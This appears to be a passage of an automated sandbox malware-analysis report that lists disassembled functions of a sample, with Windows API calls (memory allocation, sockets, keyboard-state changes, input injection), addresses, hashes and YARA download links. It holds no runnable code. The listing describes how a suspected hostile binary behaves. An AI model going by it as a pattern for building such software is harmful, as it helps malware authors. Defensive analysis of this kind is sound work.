                                                                                                                    • Opcode Fuzzy Hash: 280b8f40837f8e4d9c9d1ad5fe654a56076bd35329a217da397fa1e49c520843
                                                                                                                    • Instruction Fuzzy Hash: 74C19174A04216EFDB25CFA5C884EAEBBF5FF48304B158998E809EB251D734DD81DB90
                                                                                                                    Function 0039E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0039E0BE
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0039E101
                                                                                                                      • Part of subcall function 0039D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0039D7C5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0039E301
                                                                                                                    • _memmove.LIBCMT ref: 0039E314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659485706-0
                                                                                                                    • Opcode ID: 89bbdb87753830d34ee430ada4de5161cb03c7dcd7bb2235f3ceeef92247d61e
                                                                                                                    • Instruction ID: 4861e7a480c965dfc5580725e0343e46a7d108d700d66b17e72baba9367d417b
                                                                                                                    • Opcode Fuzzy Hash: 89bbdb87753830d34ee430ada4de5161cb03c7dcd7bb2235f3ceeef92247d61e
                                                                                                                    • Instruction Fuzzy Hash: AEC15975608311DFCB06DF28C480A6ABBE4FF89714F14896EF8999B351D731E946CB82
                                                                                                                    Function 00398093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003980C3
                                                                                                                    • CoUninitialize.OLE32 ref: 003980CE
                                                                                                                      • Part of subcall function 0037D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0037D5D4
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003980D9
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003983AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 780911581-0
                                                                                                                    • Opcode ID: 78666d91679e3ff899c1e3dfda9703c00a0500479574e53b9b3d4348d2d5cbbe
                                                                                                                    • Instruction ID: e2467d7790d08f1abe6cb6261b5ebc9922ca4513da7d267ca387922710edf2c4
                                                                                                                    • Opcode Fuzzy Hash: 78666d91679e3ff899c1e3dfda9703c00a0500479574e53b9b3d4348d2d5cbbe
                                                                                                                    • Instruction Fuzzy Hash: F1A17C396047119FCB12DF64C481B2AB7E4BF8A714F18485DF99A9B3A1CB34EC45CB86
                                                                                                                    Function 0037687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2808897238-0
                                                                                                                    • Opcode ID: f08a16a183d4059514cf0250554ff801b81fea4eb7f7256f3fab3d6bbb9bd357
                                                                                                                    • Instruction ID: 09461d03a050020a46ea2c522e65c70947a645f772d96308d0a561a2513510fc
                                                                                                                    • Opcode Fuzzy Hash: f08a16a183d4059514cf0250554ff801b81fea4eb7f7256f3fab3d6bbb9bd357
                                                                                                                    • Instruction Fuzzy Hash: 3251C9B4700B019EDB76AF65D8B262AB3E99F45310F20D81FE59EDB691DB38D8408701
                                                                                                                    Function 003A97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(011BE578,?), ref: 003A9863
                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 003A9896
                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003A9903
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: 275eda52d738ac86ef8841180b8161142b7f0e76e0402ad19ac0636b2d17b246
                                                                                                                    • Instruction ID: 14aa31a56a0eb4c0028e85dc587e890bb76aa0fa60acf3979e35fb852836b927
                                                                                                                    • Opcode Fuzzy Hash: 275eda52d738ac86ef8841180b8161142b7f0e76e0402ad19ac0636b2d17b246
                                                                                                                    • Instruction Fuzzy Hash: B7515334A00205EFCF26CF54C884AAE7BB9FF56360F15825EF955AB2A0D731AD41CB90
                                                                                                                    Function 00379A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00379AD2
                                                                                                                    • __itow.LIBCMT ref: 00379B03
                                                                                                                      • Part of subcall function 00379D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00379DBE
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00379B6C
                                                                                                                    • __itow.LIBCMT ref: 00379BC3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: 9515bee86ea496f9376553423f347dff2726544d17bc24632b92b956410a7ecb
                                                                                                                    • Instruction ID: 4bafebe606471296255c82ae8d27efd831f43c2867d57de7572122127f0fef8c
                                                                                                                    • Opcode Fuzzy Hash: 9515bee86ea496f9376553423f347dff2726544d17bc24632b92b956410a7ecb
                                                                                                                    • Instruction Fuzzy Hash: 37417475A00218ABDF23DF54D845FEE7BB9EF45710F00406AF909AB291DB749A44CB91
                                                                                                                    Function 003969AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 003969D1
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003969E1
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00396A45
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00396A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2214342067-0
                                                                                                                    • Opcode ID: fd91297490b08e98613d2532bda0998c39135ae3c67901a15c706b1ba7f57405
                                                                                                                    • Instruction ID: 213a081bc8c515474badcc211056e5293f74266631ed742c078e2cdeadc28097
                                                                                                                    • Opcode Fuzzy Hash: fd91297490b08e98613d2532bda0998c39135ae3c67901a15c706b1ba7f57405
                                                                                                                    • Instruction Fuzzy Hash: 6141B175740210AFEB62AF64DC87F3A77E89F09B14F44C419FA59AF2C2DA749D008B91
                                                                                                                    Function 0039641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003AF910), ref: 003964A7
                                                                                                                    • _strlen.LIBCMT ref: 003964D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4218353326-0
                                                                                                                    • Opcode ID: fea589d8edddc3df66d6f2c066de7704fca6edbc5d75cf2017815b63c792f7c4
                                                                                                                    • Instruction ID: c040a08933a8d33c2029841c40196b16a260a435a889a5b86e54eb5e6ff6e273
                                                                                                                    • Opcode Fuzzy Hash: fea589d8edddc3df66d6f2c066de7704fca6edbc5d75cf2017815b63c792f7c4
                                                                                                                    • Instruction Fuzzy Hash: 0E41B771A00214AFCF16EBA4EC96FAEB7ADAF45310F158155F8199F292DB30EE44C750
                                                                                                                    Function 0038B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0038B89E
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0038B8C4
                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0038B8E9
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0038B915
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 1a7929303f4714dd5f8fe95dbf259517e2fec352da02a601317d458c0e92fa9a
                                                                                                                    • Instruction ID: 661ea6db61f98b06a6ce24c4bf53067dc2a72bf3deb3ea096708694e0e658d03
                                                                                                                    • Opcode Fuzzy Hash: 1a7929303f4714dd5f8fe95dbf259517e2fec352da02a601317d458c0e92fa9a
                                                                                                                    • Instruction Fuzzy Hash: 73412A39600661DFCB12EF55D484A59BBE5EF8A310F098099EC4A9F362CB30FD01CB95
                                                                                                                    Function 003A8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003A88DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: a968792e09eba139ee255c6283cc6828ca001fdb4d4db90ff4323133e6ab5175
                                                                                                                    • Instruction ID: 8d643d999d0444bef33c662aa5450537eb294bc1f31e04e45398ada8a9d07ef7
                                                                                                                    • Opcode Fuzzy Hash: a968792e09eba139ee255c6283cc6828ca001fdb4d4db90ff4323133e6ab5175
                                                                                                                    • Instruction Fuzzy Hash: C531D234600108AFEB279F58CC85BBA77B9EB07310F55451AFA51E61E1CF74D9409752
                                                                                                                    Function 003AAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 003AAB60
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003AABD6
                                                                                                                    • PtInRect.USER32(?,?,003AC014), ref: 003AABE6
                                                                                                                    • MessageBeep.USER32(00000000), ref: 003AAC57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: ada50d6b538443c6a79ce5a84979e525fb7a1846c7a72019922d7c651e1c1cea
                                                                                                                    • Instruction ID: f1ad885b1d085ec7348d01820df41465e2c8dff85f08ec988a4cab571e1f6aa8
                                                                                                                    • Opcode Fuzzy Hash: ada50d6b538443c6a79ce5a84979e525fb7a1846c7a72019922d7c651e1c1cea
                                                                                                                    • Instruction Fuzzy Hash: 99418E32600A19DFDB27DF58C884A697BF9FB4A320F1581A9E815DF260D730E841CB92
                                                                                                                    Function 00380AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00380B27
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00380B43
                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00380BA9
                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00380BFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 4cbfd83767abdbf67ac8b1ab4a6692c6dd0cc230614294e4382aadf82da86b1a
                                                                                                                    • Instruction ID: 603b4ac7f4be45d250c3b93192fb72df92dbe59ba90664607feb2211da594738
                                                                                                                    • Opcode Fuzzy Hash: 4cbfd83767abdbf67ac8b1ab4a6692c6dd0cc230614294e4382aadf82da86b1a
                                                                                                                    • Instruction Fuzzy Hash: E5315A30D40308AFFF7BAB658C05BFABBA9AB45318F0442DAE490561D1C379C9489751
                                                                                                                    Function 00380C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00380C66
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00380C82
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00380CE1
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00380D33
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: f588b3382f4f5bb52e7ee702d39e6c53f8b6d17d1b6b2c3cd4a0c6252a87e8bd
                                                                                                                    • Instruction ID: c0a6624324cbadccdc444c70c3dfda224f7fafaaea3d8e507b08727928b0583b
                                                                                                                    • Opcode Fuzzy Hash: f588b3382f4f5bb52e7ee702d39e6c53f8b6d17d1b6b2c3cd4a0c6252a87e8bd
                                                                                                                    • Instruction Fuzzy Hash: 0E315830940308AEFF7BAFA5CC047FEBB7AAB46310F0583AAE4945A1D1C339994D8751
                                                                                                                    Function 003561C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003561FB
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00356229
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00356257
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0035628D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: d25c208411cb960ab0203caf189c469bdfbe745698baab39e381a000d278d8e9
                                                                                                                    • Instruction ID: 4a564bf01a664a8ab86d373f0c4805ec6c775f04d26a382cfd7492ebafc6c783
                                                                                                                    • Opcode Fuzzy Hash: d25c208411cb960ab0203caf189c469bdfbe745698baab39e381a000d278d8e9
                                                                                                                    • Instruction Fuzzy Hash: 9431C030604246AFDF228F65CC46FBA7BB9FF42311F564528EC649B1A1DB30E954DB90
                                                                                                                    Function 003A4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 003A4F02
                                                                                                                      • Part of subcall function 00383641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038365B
                                                                                                                      • Part of subcall function 00383641: GetCurrentThreadId.KERNEL32 ref: 00383662
                                                                                                                      • Part of subcall function 00383641: AttachThreadInput.USER32(00000000,?,00385005), ref: 00383669
                                                                                                                    • GetCaretPos.USER32(?), ref: 003A4F13
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 003A4F4E
                                                                                                                    • GetForegroundWindow.USER32 ref: 003A4F54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: 22617b957971727372becf1dc97b816c839d9e4b8646212e1ec08fb875f846e7
                                                                                                                    • Instruction ID: 75340c854fe037d22cb9c56a27718651579d9ef89bd25eba31298820927199d8
                                                                                                                    • Opcode Fuzzy Hash: 22617b957971727372becf1dc97b816c839d9e4b8646212e1ec08fb875f846e7
                                                                                                                    • Instruction Fuzzy Hash: DA313E71D00218AFDB01EFA5D885AEFB7FDEF99300F10446AE415E7201EA759E058BA0
                                                                                                                    Function 003AC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • GetCursorPos.USER32(?), ref: 003AC4D2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0035B9AB,?,?,?,?,?), ref: 003AC4E7
                                                                                                                    • GetCursorPos.USER32(?), ref: 003AC534
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0035B9AB,?,?,?), ref: 003AC56E
                                                                                                                    Memory Dump Source
